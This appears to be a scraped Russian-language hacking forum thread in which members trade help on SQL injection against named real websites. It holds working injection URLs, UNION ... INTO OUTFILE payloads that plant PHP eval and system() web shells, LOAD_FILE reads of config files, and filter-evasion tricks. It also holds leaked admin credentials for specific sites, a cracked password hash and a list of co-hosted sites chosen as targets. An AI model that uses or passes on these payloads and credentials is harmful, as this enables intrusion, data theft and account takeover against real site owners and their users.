http://www.exportbureau.com/trade_leads.html?lead=99999999999999999999999999
Дальше стоит фильтрация на order by и union select
Че делать?

http://www.tbc-world.com/resprofile.asp?id=-5685946+order+by+25--&lng=en&companytype=2
Вот еще одна конторка. по моему тоже фильтрация стоит.

Народ есть шелл с99 от маднета
так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
но на сервере стоит виндувс 2008 как тут тогда быть?

molotovkeyt, первая ссылка не открывается, вторая:
http://www.tbc-world.com/resprofile.asp?id=5685946+and+ascii(substring((sel ect+top+1+table_name+from+information_schema.table s),1,1))=84--

Народ есть шелл с99 от маднета
так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
но на сервере стоит виндувс 2008 как тут тогда быть?
Вот, не помню кто вылаживал, скрипт на пхп,http://slil.ru/26579035. Еще можно попробывать архиваторы из unix - версии под windows,например tar, но я хз будет ли он работать под 2008.

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8");
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?>

SAVE_FILES - путь откуда скачиваються файл

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???


неполучится скачать, нет SQL-инекции в запросе

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8");
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?>

SAVE_FILES - путь откуда скачиваються файл
upload.php?id=-1+union+select+load_file('/folder/config.php'),2--+
первая сточка

тоже нужно переводить в чар?
необязательно (левая часть)

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?
Нужен путь. Так тоже зальёт, но в папку с базой, из веба не увидешь. В чар нельзя путь переводить

'/путь/shell.php'

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester
Нет, путь нужен полный от корня, или если винда , то с диска. Ты-же на локалке тренируешься? Пробуй лить с такими ../../ путями, и с полными, потом поиском ищи куда залилось, и сам всё поймёшь

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql‘])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'file://localhost/C:/shell.php'

если все верно,шел доступен по адресу
http://localhost/shell.php

Я правильно понимаю?
Запрос Верно составлен?

Нет , Локальный путь, то что ты видишь в проводнике(или что там у тебя), а не в браузере. И доступен он будет там куда ты его положишь.

Тоесть (например для денвера)
http://localhost/ ------- это Z:\home\localhost\www\

Льём
INTO+OUTFILE+'Z:\home\localhost\www\shell.php'

доступен:
http://localhost/shell.php

l1ght

нет не хочет почему то

он будет говорить,что это троян!Даже бат он распознает как троя!

А можно объяснить, почему он так будет говорить? Что именно антивирусу не понравится? Я к примеру запускаю бат и не ругается, вношу изменения в реестр и тоже тишина :)

Каспер фиксирует даже минимальные изминения в системе,находит прогу,которой вызваны изменения и опредиляет её как вредоносную, иль трояна.

Каспер фиксирует даже минимальные изминения в системе,находит прогу,которой вызваны изменения и опредиляет её как вредоносную, иль трояна.

ну а как можно сделать чтобы кнопка enter нажималась програмно? если можно поподробней :)
и чеита у меня на каждое изменение в системе нпомалкивает нод 32??

2Neponomat а ключ /s не катит?)

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET['sql'])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'

что-то опять не так делаю,может закодировать?

kevmen, "<?php eval($_GET['sql'])?>" или '<?php eval($_GET["sql"])?>' или '<?php eval($_GET[sql])?>' и т.д.

kevmen, "<?php eval($_GET['sql'])?>" или '<?php eval($_GET["sql"])?>' или '<?php eval($_GET[sql])?>' и т.д.
бесполезно,не получается

Закодируй в 16битный формат вида 0xHEX_CODE...

http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+0x5a3 a5c7368656c6c2e706870

тоже не помогает

INTO+OUTFILE+'Z:\shell.php' нельзя хексить..

Пробуй:

http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\s hell.php'

Убери с оутфайла хекс,если не поможет, значит вероятно фильтрация кавычек в запросе...

http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\s hell.php'

пробовал так,бесполезно все!

'Z:\shell.php'
вот это нужно как-то приподнести без кавычек)

Где то была инфа по обходу фильтрации кавычек, но будет она пахать в даном случае-хз...

'Z:\shell.php'
вот это нужно как-то приподнести без кавычек)

Кавычки должны быть и обязательно "настоящими"

Если тебя интересует заливка шелла, то при наличии прав с помощью лоад файла можно узнать пассы от бд и попытатся залить шелл через пхпмайадмин...

kevmen Вопросы я смотрю пошли по кругу, на них уже отвечали , кури это :
https://forum.antichat.ru/threadnav34338-1-10.html

и вообще, давай сначала хоть что-то читай, потом вопросы по прочитанному

jokester,хорошо,я читаю вот это
http://forum.antichat.ru/thread43966.html

и вопросы у меня именно по прочитанному)

какие вопросы?? при экранировании кавычек into outfile не работает тк требует использования этих самых кавычек в синтаксисе.

http://localhost/view_cat.php?cat=-1+union+select+1,2,LOAD_FILE(0x766965775f6361742e7 06870),4,5,6,7,8,9

ну вот )хочу прочесть файл view_cat.php.Страница отображается верно,но содержание файла не выводится ,я никогда не сталкивался с такими вещами,поэтому не знаю,как должна отображатся страница)извините,если пишу что-то не так и не то

kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!

Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html

, так вот оттуда выдержка:
Рассмотрим функцию LOAD_FILE

Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('etc/passwd'),4,5,6;

Для нее есть также несколько ограничений.
Должен быть указан полный путь к файлу.

kevmen,
user()
==>
select file_priv from mysql.user where user = blablabla

@localhost не пиши в юзнейме

jokester,спасибо)получилось,оп� �ть невнимательность)
http://localhost/view_cat.php?cat=1+union+select+1,2,LOAD_FILE(0x5a 3a5c686f6d655c6c6f63616c686f73745c7777775c7363686f 6f6c5c766965775f6361742e706870),4,5,6,7,8,9

kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!

Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html

, так вот оттуда выдержка:
я до этого еще не дошел,сейчас читаю
https://forum.antichat.ru/threadnav34338-1-10.html

http://www.mormontimes.com/mormon_voices/?id=3237+or+1=1
http://www.wiser.pitt.edu/apps/news/viewArticle.asp?article_id=68+or+1=1/*
что думаете?

что думаете?
первая )+order+by+32--+
вторая не открывается

2Neponomat а ключ /s не катит?)

а что это означает?

http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32

я так понял стоит фильтрация на union?

http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+

Чтобы увидеть вывод: =-3237)+union...

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен

http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+

Читайте внимательнее, сверху же l1ght написал....

Что значит "union отключен"? )))

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
методом научного тыка =\ order by 33 нет вывода а 32 есть. читаем статьи. а лучше изучить логику скл запросов.

2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"

Вообщем такая ситуация нарисовалась =) нашел уязвимость..но ничего не могу сделать т.е - The following SQL error occurred: The following table could not be opened.
d:\88.4.211.213\[securedir?????????]/webgene\//*{}*\\
(101)

вот что пишет ... вот это значение могу менять - //*{}*\\ ...т.е запрос типа
?p_file=//*{}*\\&
можно вывести 1001 ошибку... кто подскажет как инжект параметр туда...всё перепробовал никак не катит... ну чтобы таблицы получить или команду выполнить
Кстати да...это не PHP движок а простой хтмл ну как вы видите... или я ошибаюсь =)

Урлу сюда

здравствуйте
у меня есть доступ к админке phpbb 2.0.13
мне нужно слить базу ~200 метров, но мне надо только таблу с юзерами
захожу в Backup Database, там выбираю Full backup, но сливается только 80% базы, а в конце дампа ошибка
SQL Error : 2013 Lost connection to MySQL server during query<br /><br />SHOW FIELDS FROM phpbb_ranks</br /><br />Line : 375<br />File : admin_db_utilities.php

как слить таблицу phpbb_users, или как залить шелл в phpbb 2.0.13

https://forum.antichat.ru/showpost.php?p=198446&postcount=3

2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
чётат так не юзаеься ) куда это так надо написать?
а если заюзать вот так, но только без оповещения и без удаления в конце. как лучше? антивирус молчит на такие действия :)

WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Popup("Создаем раздел"); WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer"); WSHShell.Popup("Создаем строковый параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1); WSHShell.Popup("Создаем параметр DWORD"); WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD"); WSHShell.Popup("Создаем двоичный параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY"); WSHShell.Popup("Удаляем все параметры"); WSHShell.RegDelete("HKCU\\MyRegKey\\String"); WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD"); WSHShell.RegDelete("HKCU\\MyRegKey\\Binary"); WSHShell.Popup("Удаляем раздел"); WSHShell.RegDelete("HKCU\\MyRegKey\\");

Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/

??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?

Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/

??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?
модреврайт

>> Почему?
Мб потому что значение которое ты указываешь не существует?

Значит затёрся на одном месте.
Есть в скрипте выполнение php команд.
Хочу залить шелл в одну директорию, права на неё: drwxrwxrwx
Системные команды выполняются, но ни через WGET, ни через copy не заливается шелл... Типа команда выполненна без ошибок, но итог 404
Инклуд тоже не пашет...

Что тут можно предпринять?

в чем проблема заюзать другую качалку вроде lynx

Nightmarе, а что тебе мешает выполнить команду:

echo "<?php system(\$_GET['cmd']); ?>" > shell.php

Пробуй писать полные пути...

groundhog, по сути у него это и есть)

Nightmarе, можно создать файл, как сказал groundhog, только его содержимое будет примерно таким:


<?php file_put_contents('путь до файла', $_POST['file']); ?>

Далее, создаешь на локале файл:

<form action='http://site.com/путь_до_получившегося_файл� �' method='post'>
<textarea name='file'></textarea>
<input type='submit'/>
</form>

Кидаешь в текстарею код шелла, жмешь баттон, и получаешь веб-шел)

Комрады подскажите!!!
Нужно похекать сайт на vBulletin 3.5.4
На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
Таким образом можно сделать дамп базы данных.
Как должен будет выглядеть запрос?
Мне для начала нужно заняться подборкой полей?
Просто Инъекциями я начал заниматься недавно, в голове полная каша...
помогите разобраться...

Мне для начала нужно заняться подборкой полей?


ага, только перед этим еще убедится, что по данному урлу именно sql-inj, а не просто раскрытие пути и т.п.

/install/upgrade_301.php?step=backup

И вообще... Тебе сюда:

http://forum.antichat.ru/thread22852.html

На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
Таким образом можно сделать дамп базы данных.
Если ты имел в виду это Easy way to 0wn nulled vBulletin installations (http://www.waraxe.us/advisory-67.html), то речь идет не о SQL-инъекции, так как получить дамп позволяет отсутствие проверки лицензионого ключа на нуленных версиях vbulletin

помогите найти админку)
случайно наткнулся,основной сайт вроде с фильтрацией а подраздел полностью дырявый
http://www.7info.ru/schools

http://www.7info.ru/robots.txt

Disallow: /sitadm/

ElteRUS,у этого раздела schools своя админка вроде

Forbidden

You don't have permission to access /sitadm/ on this server.

Это значит я не имею права к просмотру данной папки?

А просто на главной не пробовал ввести?

e5c360d1629a5a05bd77f0f45c24fa9e
Это md5?

да

e5c360d1629a5a05bd77f0f45c24fa9e;rerkjdjl

hashcracking.info

http://ilibrary.ru/text/1320/p.1' - уязвимость есть, делаю
http://ilibrary.ru/text/1320/p.1+order+by+1+-- - пишет ошибку =(
Подскажите)

http://ilibrary.ru/text/1+)and+substring(version(),1,1)=5;%20--%20((
подскажите)

1. Там другой комментарий, а именно /*
2. Там фильтруется "+"

И еще "=" заменяется на "."

Но можно раскрыть путь:

http://ilibrary.ru/text/1%22

и еще там addslashes (http://ru.php.net/addslashes)

http://ilibrary.ru/text/1'

так что скорее всего только путь пока

пробелы меняем на /**/

R1dex
Опять торопишься. Там слепая скуль на 4 ветке(может и можно вывод найти, особо не копал), комментарий не критично

http://ilibrary.ru/text/1320/?p=1+and+substring(version(),1,1)=4
http://ilibrary.ru/text/1320/?p=1))+order+by+25+--+
http://ilibrary.ru/text/1320/?p=1))+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5/*

По результатам запроса, грузит файл отсюда:
http://ilibrary.ru/tx2/13/
Возможно и можно что-то вымутить, но мне лень :)

Pashkela ай-я-яй :)

kevmen Я тебя умоляю, пока ненужно давать ответов на вопросы :)

пробелы меняем на /**/
ахахаха... там ведь мод реврайт и все / ситаются разделителями ;)

пробелы меняем на /**/
не поможет, тк там mod_rewrite передает все на файл index.phtml, который как раз в REQUEST_URI заменяет = на точку, применяет urlencode и разбивает его на массив по слешам.

=/ чет запоздал с ответом

Да там даже вывод есть:

ilibrary_il@localhost:4.0.27-standard-log:ilibrary_ilibrary («ilibrary_il@localhost»)

В общем путём долгих манипуляций удалось понять какие поля уводят цикл обработки содержания в бесконечный цикл и исключить их, этот запрос даёт нормальный вывод:

http://ilibrary.ru/text/1320/?p=999))+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONC AT_WS(0x3a,USER(),VERSION(),DATABASE()),13,14,15,1 6,17,18,19,20,21,22,23,USER(),25%23

А как там вывод определить ? оО
ЗЫ: А твой метод борьбы я вообще не догнал))

%23 это ещё один вариант комментария в SQL (#), который у них не фильтруется, кол-во колонок было подобрано с помощью ORDER BY, т.к. одно из 25 полей приводило к бесконечному циклу я сначала во все поля засунул USER и посмотрел где идёт вывод, потом убрал лишние, нашёл поле, которое глючит (24 поле), оставил в нём строку и выставил уважаемым на обозрение...

http://ilibrary.ru/search.phtml?q=1%27)+union+select+version(),2,last name,4+from+autors/*

groundhog да у них ничего не фильтруется, будет работать и +--+ и /*, ты сейчас запутаешь новичков :)

Просто нужно изначально обращение в обход mod_rewrite
Тоесть
http://ilibrary.ru/text/1320/p.1
=
http://ilibrary.ru/text/1320/?p=1

ну и с выводом, конечно молодец, мне терпения не хватило разбираться

А почему %2523 ? %23 же символ решётки.И ещё: почему скобки )),а не (( ? Ведь при запросе вывод такой:

)) AND autors.id_a = text_auth.id_a AND texts.id_t = parts.id


:(

А почему %2523 ? %23 же символ решётки.И ещё: почему скобки )),а не (( ? Ведь при запросе вывод такой:

)) AND autors.id_a = text_auth.id_a AND texts.id_t = parts.id


:(
Не %2523, а 25%23. Последний столбец 25 и #

По поводу скобок внимательно прочитай, что ошибка пишет "неверный синтаксис ВОЗЛЕ ))" тоесть в запросе их нужно закрыть

Блин, ну почему всего этого нету в факе?=(
Спасибо огромное всем, кто помог - но вывестти столбцы так и не удалось, access denied (

Я читал,но скобки разве не закрываются в противоположную сторону?(Как обычно)

ascii(substring());

Но если комментарий работает,то почему он не может просто исключить эти скобки,т.к. они стоят за моим комментарием ?

А если он закрывает скобки предыдущие,то должно быть ))ID,где ID - какое-то число или символ.

ЗЫ:Походу,это выше Вели...

Спасибо огромное всем, кто помог - но вывестти столбцы так и не удалось, access denied (
Если ты пытался вывести через INFORMATION_SCHEMA то там 4 ветка и там нет INFORMATION_SCHEMA Database.

HI,

Я как-то задавал аналогичный вопрос, но появился еще один.
Суть такова:
При выводе данных, выводимая информация ограничена, то есть выводится не вся, через лимит выводится гораздо больше.
Мне советовали выводить информацию разными способами, один из них:
GROUP_CONCAT(name,0x3a,pass)+FROM+table+WHERE+ASCI I(lower(name))=97
то есть вывод юзеров на "a".
Перебором я выбрал выбрал нужных юзеров, все ОК.
Теперь вопрос:
Можно ли сразу вывести данные не через перебор как указано выше?

Спасибо!

Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
name,pass+FROM+table+limit+1,1
В чём вопрос, попробуй переформулировать

привет всем, вопросик стоит примерно так : есть сайт и как я думаю скуля хотя по моему слепая... перебором даже version () запрос выдаёт тарабарщину примерно вот так $bAY9<j*
http://www.fcsteaua.ro/felicitari/tag/-embleme+order+by+100000000000000000000000
выводит всё на страничку... встречался ли кто нибудь с подобным явлением? Буду очень признателен если мне помогут. Заранее спасибо.

У меня два вопроса:
1. где тут вывод полей?
http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,5, 6,7,8,9,10/*
2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27

У меня два вопроса:
1. где тут вывод полей?
http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,5, 6,7,8,9,10/*
2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27

1. http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,ve rsion(),%20%206,7,8,9,10,11,12/*
2. http://www.aroma-france.info/parfums.php?poll=17'+order+by+5--+

2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27
http://www.aroma-france.info/parfums.php?poll=17%27/**/union/**/select%20version(),2,3,4,5--%20-

Тупой вопрос. Как с помощью скули залить шелл?
Или слить двиг?

2 Arigona поищи на форуме. есть куча флуда на енту тему да и тема есть отдельная

Тупой вопрос. Как с помощью скули залить шелл?

union+select+1,'<?php eval($_GET[‘cmd’]) ?>',3 INTO OUTFILE 'путь/shell.php'--

путь/shell.php это путь к шеллу лежащему к примеру на бесплатном хосте, или путь где сохраниться он?

Access denied for user 'a4860939_df'@'localhost' (using password: YES)

Пишет -\

полный путь куда тебе надо залить шелл
например /server/www/public_html/site/images/shell.php
у каждого сайта свой путь по поводу путей опять же поищи на форумe

Arigona Поиск по форуму, вот одна из тем:
https://forum.antichat.ru/threadnav34338-1-10.html

В этой теме , несколько страниц назад, велась та=же беседа на 10 листов,
можешь почитать отсюда посты kevmen'а и ответы на них:
https://forum.antichat.ru/threadnav46016-502-10.html
не нужно её повторять, пожалуйста :)

У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?

У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!

Народ,нужна помощь...думаю даже вам будет интересно...и так:
есть скуль(5 ветка)
http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,username,3,password,5,6,7 ,8,9,10,11%20%20FROM%20admin
login : admin
pass : root78
есть админка
http://www.krimsex.com/admin.php
пароль не подходит. вопрос..почему?
ето не все, то была табла admin,есть ещё табла users
http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,login,3,password,5,6,7,8, 9,10,11%20%20FROM%20users
пробывал лимитом 10 акков,не один не подошол..
вход для юзеров тут:
http://www.krimsex.com/login.php
Очень большая просьба помочь

http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--

Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36

ЗЫ: postgre_sql()

http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--

Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36

ЗЫ: postgre_sql()

Вот запрос - выдергивает все таблицы, в которых есть колонка "password"
UNION+SELECT+group_concat(table_name)+FROM+INFORMA TION_SCHEMA.columns+where+column_name=0x7061737377 6f7264--
так же в хексе можна вставить любое название колонки

http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--

Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36

ЗЫ: postgre_sql()

www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='табл ица'--

offset - это тот же limit в MYSQL.

TELO,

Надо не хексить, а переводить в char..
К тому же, вопрос был совсем другой.

Надо не хексить, а переводить в char..


это почему?

Вроде PostgreSql не поддерживает hex или я ошибаюсь?

Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1

Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.

Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
кавычки экранируются во первых...

ссыль дай


R1dex:

PostgreSql


сорри, не заметил

ссыль дай

Кому адресовано?))

Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.

Я и говорю, хекс не катит, а char действует. Просто надо чарить не как в MYSQL...

Вот например таблица user, переведённая в char для PostgreSQL.

chr(117)||chr(115)||chr(101)||chr(114)

Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(

Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
это конкатенация

кавычки экранируются во первых...
Так значит вместо кавычек ставить %27? запрос
UPDATE+%27auth%27'+SET+usertype=%27admin%27+WHERE+ user_id=2

аж смешно,вот ещё одна така скуль
http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,1 0,11,12,13,14,password,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30%20FROM%20admin--
пароли такие же..
admin::root78
http://sex.dp.ua/admin.php
юзеров воще не нашол

Так значит вместо кавычек ставить %27? запрос
UPDATE+%27auth%27'+SET+usertype=%27admin%27+WHERE+ user_id=2


нет.. ' и %27 - это одно и тоже. и сэкранируется это все все равно.
Кроме того сам запрос у тебя неправильный,

http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2

это бред... такое проканает только в MSSQL, да и то не всегда..

вот так было бы, если бы была MSSQL

http://**/id=99999;UPDATE 'aut' SET usertype='admin' WHERE user_id=2

то есть два запроса сразу идут.. в mysql такое нельзя делать.

аж смешно,вот ещё одна така скуль
http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,1 0,11,12,13,14,password,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30%20FROM%20admin--
пароли такие же..
admin::root78
http://sex.dp.ua/admin.php
юзеров воще не нашол

http://2ip.ru/server.php?ip=193.200.173.5

чо вы там мучаетесь - надо уже шелл заливать ))

0) www.kmstudio.com.ua Pr: 2 тИЦ: 130
1) www.lse.ua Pr: 4 тИЦ: 30
2) www.metr.tv Pr: 3 тИЦ: 30
3) www.vagabondgallery.com Pr: 3 тИЦ: 0
4) www.freedomhouse.org.ua Pr: 4 тИЦ: 40
5) www.codec.kiev.ua Pr: 3 тИЦ: 10
6) www.netpeak.net Pr: тИЦ: 240
7) www.venus.com.ua Pr: 3 тИЦ: 0
8) www.sexua.com.ua Pr: 4 тИЦ: 20
9) www.intime.com.ua Pr: 3 тИЦ: 300
10) www.sex.inday.info Pr: 3 тИЦ: 0
11) www.d1udf.com Pr: 3 тИЦ: 10
12) www.sinp.com.ua Pr: 4 тИЦ: 110
13) www.kmstudio.kiev.ua Pr: 4 тИЦ: 20
14) www.smereka.com Pr: 2 тИЦ: 30
15) www.1minuta.com Pr: 3 тИЦ: 0
16) www.pcphonehome.biz Pr: 1 тИЦ: 0
17) www.muzred.com Pr: 3 тИЦ: 20
18) www.sarepta-mediplast.com Pr: 2 тИЦ: 10
19) www.artpuppets.odessa.ua Pr: 3 тИЦ: 10
20) www.bestsoft.zp.ua Pr: 3 тИЦ: 30
21) www.termolit.ua Pr: 3 тИЦ: 50
22) www.snok.com.ua Pr: 2 тИЦ: 10
23) www.cheremshyna.org.ua Pr: 3 тИЦ: 10
24) www.xlclub.com.ua Pr: 1 тИЦ: 10
25) www.autosale.net.ua Pr: тИЦ: 10
26) www.nservice.com.ua Pr: 2 тИЦ: 20
27) www.fortissimocomua.s9.yourdomain.com.ua Pr: тИЦ: 1400
28) www.kalugin.info Pr: 2 тИЦ: 10
29) www.pilgrim.ua Pr: 2 тИЦ: 30
30) www.kievbest.com Pr: 2 тИЦ: 10
31) www.svitdverey.kiev.ua Pr: 3 тИЦ: 30
32) www.melissa.com.ua Pr: 1 тИЦ: 0
33) www.dveri-mir.com.ua Pr: 2 тИЦ: 10
